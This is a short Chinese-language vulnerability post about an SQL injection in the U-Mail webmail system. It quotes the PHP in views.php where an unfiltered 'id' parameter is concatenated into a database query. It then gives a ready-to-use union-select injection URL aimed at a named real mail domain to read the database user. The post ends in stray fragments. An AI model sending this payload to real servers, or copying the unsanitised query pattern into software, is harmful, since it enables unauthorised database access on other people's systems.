U-Mail邮件服务系统最新版SQL注入漏洞

漏洞文件:client\option\module\views.php
[php]
if ( ACTION == "letterpaper" )

{

$lp_id = gss( $_GET['id'] );

if ( $lp_id )

{

if ( $lp_id == "add" )

{

$lp_info['letterpaper'] = "

";

}

else

{

$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );

}

}

else

{

$lp_list = $Widget->get_letterpaper( array(

"fields" => "*",

"where" => "UserID=0 or UserID=".$user_id,

"orderby" => "UserID",

"debug" => 0

) );

}

include( load_tpl( "op_letterpaper" ) );

}

[/php]
未过滤直接进入查询
[php]
$lp_info = $Widget->getone_letterpaper( "id=".$lp_id, "*", 0 );
[/php]
http://mail.comingchina.com/webmail/client/option/index.php?module=view&action=letterpaper&id=1%20and%201=2%20union%20select%201,2,3,user(),5,6,7,8

1

1e
[php]

发表评论